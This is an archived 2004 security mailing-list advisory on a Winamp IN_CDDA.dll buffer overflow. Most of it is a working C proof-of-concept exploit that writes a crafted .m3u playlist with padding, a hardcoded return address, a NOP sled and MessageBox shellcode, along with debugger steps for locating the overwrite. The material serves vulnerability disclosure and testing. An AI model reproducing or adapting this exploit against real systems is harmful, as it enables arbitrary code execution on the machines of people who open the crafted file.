Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | [EXPL] Winamp IN_CDDA.dll Remote Buffer Overflow Exploit |
|---|---|
| Date: | 25 Nov 2004 14:06:01 +0200 |
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source. http://www.securiteam.com/mailinglist.html - - - - - - - - - Winamp IN_CDDA.dll Remote Buffer Overflow Exploit ------------------------------------------------------------------------ SUMMARY As we reported in our previous article: <http://www.securiteam.com/windowsntfocus/6H00M15BPU.html> Winamp IN_CDDA.dll Buffer Overflow, a vulnerability in Winamp's IN_CDDA.dll allows attackers to cause Winamp to execute arbitrary code by overflowing an internal buffer. The attached exploit code can be used to test your system for the mentioned vulnerability. DETAILS Vulnerable Systems: * Winamp version 5.05 Immune Systems: * Winamp version 5.06 * Winamp version 2.91 Exploit: /* Credits go to the author How to fix and study the bug: * - The cdda library only reserves 20 bytes for names when files are "*.cda" * - run Winamp with ollye * - when loaded locate and break at: 10009BBB 8D4C24 20 LEA ECX,DWORD PTR SS:[ESP+20] 10009BBF 84C0 TEST AL,AL 10009BC1 74 0F JE SHORT in_cdda.10009BD2 10009BC3 3C 2E CMP AL,2E 10009BC5 74 0B JE SHORT in_cdda.10009BD2 that code copies and overwrites the stack if no '.' is found in the first 20 bytes of the m3u entry. Entry must not have #EXTINF data or it won't resolve. * - name that entry like "C:\\1234567890abXXXX.cda" and xxxx will be your return address. stack will be overwritten and exception occurs. When going out of that exception you'll be launched to padding. * - look for .data section of in_cdda.dll and locate the shellcode or string, and update if needed the field Location of shellcode (see host info). In my case it's x1002355b. */ #include <stdio.h> //File ops. //m3u File format //http://hanna.pyxidis.org/tech/m3u.html // Host info: // Name=ntdll (system) // File version=5.1.2600.1217 (xpsp2.030429-213) // Path=H:\WINDOWS\System32\ntdll.dll // Name=in_cdda // Base=10000000 // Size=00031000 (200704.) // Entry=1000CE1A in_cdda.<ModuleEntryPoint> // Path=H:\Archivos de programa\Winamp\Plugins\in_cdda.dll #define HEADER "#EXTM3U\n" //Simple MessageBox Shellcode spanish XP Pro: xpsp2.030429-213 //Address of MessageBoxA in xpsp2.030429-213: 77D3b064 char shellcode[]= "C:\\1234567890ab" //Padding "\x5b\x35\x02\x10" //Location of shellcode : +-x10 bytes "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xB8" "\x75\xC1\xe4\x88" //Address of MessageBoxA + 0x11111111 "\x2D\x11\x11\x11\x11\x50\x59\x33\xc0\x50\x68\x42\x6f" "\x6f\x6d\x54\x5a\x50\x50\x52\x50\x53\x51\xc3.cda\n\r"; //Shellcode: //B8 75C1e488 MOV EAX,88e4C175 ; MessageBoxA + 0x11111111 to //2D 11111111 SUB EAX,11111111 ; Make characters readable //50 PUSH EAX ; xchg registers : eax = 77D3b064 //59 POP ECX ; Offset to API. //33C0 XOR EAX,EAX ; Create Null //50 PUSH EAX ; Put ascii0 end of string //68 61616161 PUSH 6d6f6f42 ; Create string. //54 PUSH ESP ; Get the offset to the //5A POP EDX ; Message String //MessageBox call //50 PUSH EAX ; Null Pointer //50 PUSH EAX ; Null Pointer //52 PUSH EDX ; Message //50 PUSH EAX ; Null Pointer //53 PUSH EBX ; Return address: 0x00000000 //51 PUSH ECX ; Address of MessageBoxA //C3 RETN ; Jump int main(int argc, char* argv[]) { FILE *fp; char *sc=(char *)malloc(sizeof(shellcode)+1); printf ("winamp 5.x m3u parsing poc - advisorie by Brett Moore\n"); printf ("Simple MessageBox Shellcode spanish XP Pro: xpsp2.030429-213\n"); printf ("Address of MessageBoxA in xpsp2.030429-213: 77D3b064\n"); printf ("Tested on Winamp 5.02\n\n"); if (sc == NULL) { printf ("malloc error\n"); return -1; } memset(sc,'\0',sizeof(sc)); memcpy(sc, shellcode, sizeof(shellcode) ); fp = fopen ("test.m3u","w+"); if (!fp) { printf (" error opening file.\n"); return -1; } fwrite (HEADER, 1, strlen (HEADER), fp); fwrite (sc , 1, strlen(sc) , fp); fclose (fp); printf ("file test.m3u created. Just double click it.\n"); return 0; } ADDITIONAL INFORMATION The information has been provided by <mailto:brett.moore@security-assessment.com> Brett Moore. ======================================== This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com ==================== ==================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | [TOOL] IPFront - Windows 2000 and 2003 Hardening GUI, SecuriTeam |
|---|---|
| Next by Date: | [NT] Limited Buffer Overflow and Arbitrary Memory Access in Star Wars Battlefront, SecuriTeam |
| Previous by Thread: | [TOOL] IPFront - Windows 2000 and 2003 Hardening GUI, SecuriTeam |
| Next by Thread: | [NT] Limited Buffer Overflow and Arbitrary Memory Access in Star Wars Battlefront, SecuriTeam |
| Indexes: | [Date] [Thread] [Top] [All Lists] |